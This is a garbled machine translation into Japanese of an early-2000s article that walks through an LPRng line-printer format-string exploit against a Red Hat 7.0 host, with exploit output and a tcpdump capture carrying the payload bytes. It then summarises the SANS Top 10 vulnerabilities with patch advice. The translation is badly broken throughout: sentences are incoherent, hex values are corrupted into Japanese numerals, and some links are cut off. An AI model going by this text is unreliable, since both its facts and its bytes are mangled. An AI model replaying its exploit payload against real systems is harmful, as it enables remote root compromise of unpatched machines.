sans上位10位とクラッカー実行される脆弱性

この記事で、私たちはカバーして実行されるクラッカー攻撃します。 私たちは見てもsans 10最も重要なインターネットセキュリティ脅威のリストです。

手口

偵察測ることが極めて重要で何がオープンで何が閉鎖された。 次のステップでは、クラッカーを破るには、実際には、コンピュータのネットワークです。 この弱点を悪用されないクラッカーのオペレーティングシステムのサービスです。

そこには多くの手口アウト;所見の右に頭痛を悪用することができます。 すべての手口に等しいませんが作成されます。 これによって、私ということでほとんどの攻撃は、オペレーティングシステムに依存します。 ラインプリンターがあるからといって搾取するということではありませんlinuxのための作業をご希望のsolarisで、その逆もあります。

を支援するとは何かを説明するようなときに利用することが実行されると、私はこの記事に含まれてからの出力を利用すると、いくつかのパケットに関与して搾取します。 最初に、少し背景にして悪用を実行することに決めました。 終盤、 2000年探査活動の増加にはポート515 （ラインプリンタポート）にします。 これは、搾取と関連してレッドハット7.0ラインプリンターデーモンです。 この文書を執筆している時点で、私はまだ見て多くのプローブをして、このサービスのファイアウォールです。

もし私を利用して見たいと思って使用する場合は、 http://www.netcat.it発見することができます。

ここでは、リスティングの約束に沿って再生されるプレーをするためにいくつかの各：

  + + + www.netcat.itリモート攻撃をlprng /のlpd 

  + + +情報搾取 

  + + +被害者： 192.168.1.25 

  + + +タイプ： 0 -r edhatから7 .0- gu inesss 

  + + + eip住所： 0xbffff3ec 

  + + + shellcode住所： 0xbffff7f2 

  + + +位置： 300 

  + + +整列： 2 

  + + +オフセット0 

  + + +攻撃192.168.1.25当社のフォーマット文字列 

  + + +ばか力式の男で、リラックスして楽しむ; > 

この出力から、私たちが知っていることを利用して攻撃するレッドハット7.0ラインプリンター（タイプ0 - redhat7.0 - guinesess ）します。 この景色を見たいと思って、 tcpdumpとどのように攻撃か？

  18:34:19.991789 > 192.168.1.5.2894 > 192.168.1.25.printer ：秒4221747912:4221747912 （ 0 ）に勝つ 

  32120 <mss 1460,sackok,timestamp 4058996 0,nop,wscale 0> （タ行） （のttl 64 、 idを11263 ） 

  4500 003c 2bff四〇 〇 〇四〇 〇六8b4e c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c8 0000 0000 

  a002 7d78 8bb1 0000 0204 05b4 0402 080a 

  003次元ef74 0000 0000 0103 0300 

  18:34:19.993434 < 192.168.1.25.printer > 192.168.1.5.2894 ：秒397480959:397480959 （ 0 ）びっくり！ 

  4221747913勝つ32120 <mss 1460,sackok,timestamp 393475 4058996,nop,wscale 0> （タ行） （ ttlを64 、 

  idの3278 ） 

  4500 003c 0cce四〇 〇 〇四〇 〇六aa7f c0a8 0119 

  c0a8 0105 0203 0b4e 17b1 13ff fba2 c2c9 

  a012 7d78 5ee7 0000 0204 05b4 0402 080a 

  0006 0103 003d ef74 0103 0300 

  18:34:19.993514 > 192.168.1.5.2894 > 192.168.1.25.printer ： 。  1:1 （ 0 ）うわっ1勝32120 <にnop 、 

 にnop 、タイムスタンプ四〇五八九九六三九三四七五> （ ） （タ行のttl 64 、 idを11264 ） 

  4500 0034 2c00四〇 〇 〇四〇 〇六8b55 c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 1400 

  8010 7d78 8dac 0000 0101 080a 003d ef74 

  0006 0103 

  18:34:19.999662 < 192.168.1.25.printer > 192.168.1.5.2894 ： p 1時31分（ 30 ）えっ1勝32120 

  <にnop 、にnop 、タイムスタンプ三九三四七六四〇五八九九六> （ ） （タ行のttl 64 、 idの3279 ） 

  4500 0052 0ccf四〇 〇 〇四〇 〇六aa68 c0a8 0119 

  c0a8 0105 0203 0b4e 17b1 1400 fba2 c2c9 

  8018 7d78 3e5b 0000 0101 080a 0006 0104 

  003次元ef74 6c70 643a 203a 204d 616c 666f 

  726次元六五六四二〇六六726f 6d20六一六四六四七二六五七三 

  730 、 

  18:34:19.999686 > 192.168.1.5.2894 > 192.168.1.25.printer ： 。  1:1 （ 0 ）えっ31勝32120 <にnop 、 

 にnop 、タイムスタンプ四〇五八九九七三九三四七六> （ ） （タ行のttl 64 、 idを11265 ） 

  4500 0034 2c01四〇 〇 〇四〇 〇六8b54 c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141e 

  8010 7d78 8d8c 0000 0101 080a 003d ef75 

  0006 0104 

  18:34:20.000863 < 192.168.1.25.printer > 192.168.1.5.2894 ： f 31:31 （ 0 ）うわっ1勝32120 

  <にnop 、にnop 、タイムスタンプ三九三四七六四〇五八九九七> （ ） （タ行のttl 64 、 idの3280 ） 

  4500 0034 0cd0四〇 〇 〇四〇 〇六aa85 c0a8 0119 

  c0a8 0105 0203 0b4e 17b1 141e fba2 c2c9 

  8011 7d78 8d8b 0000 0101 080a 0006 0104 

  003次元ef75 

  18:34:20.000878 > 192.168.1.5.2894 > 192.168.1.25.printer ： 。  1:1 （ 0 ）えっ32勝32120 <にnop 、 

 にnop 、タイムスタンプ四〇五八九九七三九三四七六> （ ） （タ行のttl 64 、 idを11266 ） 

  4500 0034 2c02四〇 〇 〇四〇 〇六8b53 c0a8 0105 

  c0a8 0119 0203 fba2 c2c9 17b1 141f 

  8010 7d78 8d8b 0000 0101 080a 003d ef75 

  0006 0104 

  18:34:20.049095 > 192.168.1.5.2894 > 192.168.1.25.printer ： p 1:424 （ 423 ）えっ32勝つ32120 

  <にnop 、にnop 、タイムスタンプ四〇五九〇 〇二三九三四七六> （ ） （タ行のttl 64 、 idを11267 ） 

 四五〇 〇 〇一デシベル2c03四〇 〇 〇四〇 〇六89ab c0a8 0105 

  c0a8 0119 0203 fba2 c2c9 17b1 141f 

  8018 7d78 54c5 0000 0101 080a 003d ef7a 

  0006 0104 4242 f0ff ffbf f1ff ffbf f2ff 

  ffbf f3ff ffbf五八五八五八五八五八五八五八五八五八五八 

 五八五八五八五八五八五八五八五八252e三一三七三六七五二五三三 

  3030 246e 252e三一三三七五二五三三三〇三一二四6e25 

  2 e32三五三三七五二五三三三〇三二二四6e25 2e31 3932 

見てみましょうここで何が起きています。 第一に、私たちを参照してください192.168.1.5と192.168.1.25しようと接続を行うのtcpの典型的な3つの方法を使用して握手をします。 イベントは、次の順序で、私たちを参照してください192.168.1.5実行しようとするの搾取に反対192.168.1.25ます。 最後に、私たちを参照して192.168.1.5推し進め423バイトのデータを192.168.1.25ます。 このためにしばらくの間継続して利用することができるようになるまでしらみつぶしに攻撃を搾取しています。

これを利用するときに働いて、 192.168.1.25提供してくれてシェル（必要に応じていないというわけで） 、と私は何もできませんたかった。

手口は、システムに侵入するクラッカーの方法です。 自分を守るために反対した場合には、お使いのオペレーティングシステムにパッチを更新しました。 （これは、すべてのシステムです。 ）

このsansトップ10

sansトップ10の最も重要なインターネットのセキュリティの脅威が共通の手口のリストは、ほとんどのコンピュータネットワークを発見されました。 このリストには貴重なものにしたという事実は、グループのシステム管理者のリストを提供するネットワークセキュリティ関連れるcveエントリ（共通の脆弱性や撮り）ので、さらに調査を進めることができた人は、必要に応じています。 このリストにはコンパイルされsansの助けを借りて、多くのセキュリティ専門家やセキュリティコミュニティです。

このデータベースれるcve http://www.cve.mitre.org/発見することができます。

続きを読むには、 sansトップ10 、 http://www.sans.org/topten.htm訪問します。

最初の搾取上場して上位10位は、バインドします。 バインドとは、プログラムに使用さdnsサーバー（名前を解決するに役立つアドレス）と、インターネット全体が使用されます。 は、過去数年のうちに、大きな穴が発見され、多くのバージョンにバインドします。 誰でも実行することが重要にバインドするために常に最新の脆弱性。 を2001年1月29日、ネットワークアソシエイツ設立することを発表しましたより多くの脆弱性に関連して発見バインドバージョン4とバインドバージョン8 。 パッチをリリースしてきたからダウンロードすることができ、お使いのオペレーティングシステムのベンダーのウェブサイトです。

希望される場合はnaiラボが発表した論文を読むには、ここを取得することができ： http://www.pgp.com/aboutus/press/pr_template.asp?pr=/pressmedia/01282001-a.asp&sel = 900またはcert勧告を読むことができ、 http://www.cert.org/advisories/ca-2001-02.htmlます。

2つ目の脆弱性悪用、 sans上位10位はcgiプログラムです。 これらの付近てきたが、ここ数年の主な理由のほとんどは、ウェブサイトがハッキングを受ける主流の注目を集めた。

これらの多くはcgi - binにプログラムをインストールした後にサンプルプログラムを残すことができるように脆弱性、悪意のあるユーザーを得るための"ルート"にアクセスできます。 ときに、攻撃者のアクセスレベルを取得して、彼は彼を喜ばせることができない（変更してウェブサイトを含める）します。 私のリンクを提供するいくつかの取得の詳細については、 cgi - binに攻撃します。 このリストの包括的ではありません;少し掘ってください。さらに脆弱性が存在すると思われる場合です。

詳細に関しましては上のcgi - binからの攻撃にhttp://www.cert.org/advisories/ca-1997-24.html 、 http://www.cert.org/advisories/ca-1996-11.html 、またはhttp://www.cert.org/advisories/ca-1997-07.htmlます。

3番目の脆弱性は、リモートプロシージャコールを利用する（ rpcを）します。 cプログラムrpcを許可する手続きを行うネットワーク上の他のマシンで通話します。 ほとんどのパッチを提供するベンダーを支援するrpcサービスを締めダウンします。 しかし、このサービスは、最善の政策については、必要としていない場合は、その後殺害してください。 実行することができエフ- ps | grepにrpcのは、プロセスid （ pid ）を見つける、そして殺す-9 pidを実行します。 rpcサービスを無効にすることもでき、ほとんどのunixを始めるオペレーティングシステムを変更して起動ファイル（位置/ etc / rc.dに/ ）からの秒（スタートアップ）をk氏（殺害）します。 見つけることができてどのようなプログラムが実行中のrpc rpcinfo - pを使用します。

詳細に関しましてはrpcの上からの攻撃にhttp://www.cert.org/incident_notes/in-99-04.htmlます。

第4 sansトップ10のリストを悪用してリモートデータサービスのセキュリティホールの脆弱性は、 iisでいます。 （正直に言うと、私は持っていませんもっと驚いたマイクロソフトの脆弱性トップ10にします。 ）私は実際にこの脆弱性を要約する対処するパッチ、 iisのクイック…ました。

詳細に関しましては上のrdsセキュリティホールからhttp://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2ます。

第5回は、脆弱性を利用する攻撃のmime sendmailとします。 これらの脆弱性に関連したバッファオーバーフロー攻撃と同様パイプを有効にしてすぐに根妥協します。 そこには、いくつかの方法があり、これらの問題点を確保します。 最初の部分は、適切なパッチを維持するためにお客様のsendmail /メールサーバです。 お持ちでない場合、これらのサービスのいずれかを実行する必要があり、それらを無効にすることができ（同じ手順に従っているとしてつづりrpc ）のです。

詳細に関しましてはsendmailのセキュリティ上の穴からhttp://www.cert.org/advisories/ca-97.05.sendmail.htmlます。

この脆弱性と同様に適用されlinuxマシンsolarisのマシンとなります。

詳細については、 sadmindとmountdのセキュリティホールは、下記http://www.cert.org/advisories/ca-99-16-sadmind.htmlまたはhttp://www.cert.org/advisories/ca-1998.12します。 mountd.htmlます。

七搾取の上位10位は、世界的なファイル共有、使用したnetbiosポート135〜139 ）します。 これは、たぶん、セキュリティ上の問題の最大のユーザーが接続している場合は、ケーブルモデムまたはdslます。 ほとんどの概念を理解できないまま、ファイル共有ファイル共有を有効にします。 もう1つの問題は、ナップスターます。 ナップスターではありませんがここに記載され、それを共有する人を必要としませディレクトリと共有することにつながるより次に必要なのです。 私たちはどうすれば正しいですか？ これらのアドバイスはサイトからsans http://www.sans.org/topten.htm ：

a.マウント時に共有ドライブ、ディレクトリを確保するために必要なだけでは共有します。

bのセキュリティを追加するためには、特定のアドレスのみを共有できるため、なりすましdns名をすることができます。

c. windows用システムでは、すべての株を確保するためには強力なパスワードで保護しています。

d. windows nt用のシステムでは、匿名の列挙を防ぐのユーザー、グループ、システムの設定やレジストリキーを経由して"空のセッション"接続してください。

インバウンドの接続をブロックしたnetbiosセッションサービス（のtcp 139 ）で、 ntのルータまたはホストになります。 の導入を検討してrestrictanonymousのレジストリキーを単体でインターネットに接続ホストまたは非ドメイン環境で信頼されます。

八は弱いパスワードを悪用します。 私はこれ以上言う必要がありますか？ どんな形でのリスク評価の1つ、共通の脆弱性のほとんどは、弱いパスワードを拝見します。 パスワードを入力してくるときには、忘れずに、次の単純なガイドライン：

-ことを確認して、パスワードは8文字以上で指定します。

-ことを確認して、パスワードの組み合わせは、数字、特殊文字、半角英数字とします。

-を選んでパスワードを設定することではありません辞書にします。

詳細については、パスワードの強さは、下記http://www.cert.org/tech_tips/passwd_file_protection.htmlます。

第9回は、 imapとpopを搾取するバッファオーバーフローの脆弱性、または間違って設定されます。 また、最善の方法を確保してからは、これらの攻撃を無効にしない場合は、サービスを必要としています。 また、最新のパッチを適用する（必要な場合は、サービスを実行します） 。

qpopper_vul.html 、またはhttp://www.cert.org/advisories/ca-1997.09.imap_pop.htmlます。

最終的な搾取、 sansトップ10には、デフォルトで設定された文字列snmpコミュニティ"パブリック"と"プライベート"とします。 弱いパスワードとともに、この脆弱性によって制御され基本的な管理することができます。

詳細については、 snmpとコミュニティ文字列は、参照してくださいhttp://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm ＃ xtocid210315ます。

これらのことを念頭に置いておくだけではなく、ウェブ上の脆弱性です。 クラッカーを使用して利用することができ、彼は彼のあの手この手あなたとあなたのネットワークに反対します。